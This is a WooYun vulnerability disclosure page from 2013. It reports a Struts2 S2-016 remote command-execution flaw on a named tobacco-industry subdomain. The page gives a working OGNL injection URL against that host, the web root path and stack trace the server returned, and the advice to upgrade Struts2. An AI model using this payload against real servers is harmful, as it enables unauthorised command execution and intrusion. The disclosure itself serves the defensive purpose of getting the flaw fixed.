烟草在线某分站struts2命令执行漏洞 | wooyun-2013-032164| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2013-032164

漏洞标题：烟草在线某分站struts2命令执行漏洞

漏洞作者： hlx98007

提交时间：2013-07-25 18:03

修复时间：2013-09-08 18:04

公开时间：2013-09-08 18:04

漏洞类型：命令执行

危害等级：高

自评Rank：10

漏洞状态：未联系到厂商或者厂商积极忽略

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2013-07-25：积极联系厂商并且等待厂商认领中，细节不对外公开
2013-09-08：厂商已经主动忽略漏洞，细节向公众公开

简要描述：

S2-016漏洞

详细说明：

struts2平台未升级漏洞

漏洞证明：

Http://ztb.tobaccochina.net/index.action?redirect%3A%24{%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29}
F:\wwwroot\zhaotoubiao\
<html>
<body>
<h1>500 Servlet Exception</h1>

<pre>
<script language='javascript' type='text/javascript'>
function show() { document.getElementById('trace').style.display = ''; }
</script>
<a style="text-decoration" href="javascript:show();">[show]</a> java.lang.IllegalStateException: sendError() forbidden after buffer has
been committed.
<span id="trace" style="display:none">
java.lang.IllegalStateException: sendError() forbidden after buffer has
been committed.
	at com.caucho.server.connection.AbstractHttpResponse.sendError(AbstractHttpResponse.java:544)
	at com.caucho.server.connection.HttpServletResponseImpl.sendError(HttpServletResponseImpl.java:266)
	at org.apache.struts2.dispatcher.Dispatcher.sendError(Dispatcher.java:771)
	at org.apache.struts2.dispatcher.Dispatcher.serviceAction(Dispatcher.java:506)
	at org.apache.struts2.dispatcher.ng.ExecuteOperations.executeAction(ExecuteOperations.java:77)
	at org.apache.struts2.dispatcher.ng.filter.StrutsPrepareAndExecuteFilter.doFilter(StrutsPrepareAndExecuteFilter.java:91)
	at com.caucho.server.dispatch.FilterFilterChain.doFilter(FilterFilterChain.java:87)
	at org.springframework.orm.hibernate3.support.OpenSessionInViewFilter.doFilterInternal(OpenSessionInViewFilter.java:198)
	at org.springframework.web.filter.OncePerRequestFilter.doFilter(OncePerRequestFilter.java:76)
	at com.caucho.server.dispatch.FilterFilterChain.doFilter(FilterFilterChain.java:87)
	at com.caucho.server.webapp.WebAppFilterChain.doFilter(WebAppFilterChain.java:189)
	at com.caucho.server.dispatch.ServletInvocation.service(ServletInvocation.java:266)
	at com.caucho.server.hmux.HmuxRequest.handleRequest(HmuxRequest.java:463)
	at com.caucho.server.port.TcpConnection.handleRequests(TcpConnection.java:577)
	at com.caucho.server.port.TcpConnection$AcceptTask.doAccept(TcpConnection.java:1211)
	at com.caucho.server.port.TcpConnection$AcceptTask.run(TcpConnection.java:1152)
	at com.caucho.util.ThreadPool$Item.runTasks(ThreadPool.java:759)
	at com.caucho.util.ThreadPool$Item.run(ThreadPool.java:681)
	at java.lang.Thread.run(Thread.java:619)
</span>
</pre>

<p /><hr />
<small>
Resin/3.2.1
Server: ''
</small>
</body></html>

修复方案：

升级struts2版本到最新

版权声明：转载请注明来源 hlx98007@乌云

漏洞回应

厂商回应：

未能联系到厂商或者厂商积极拒绝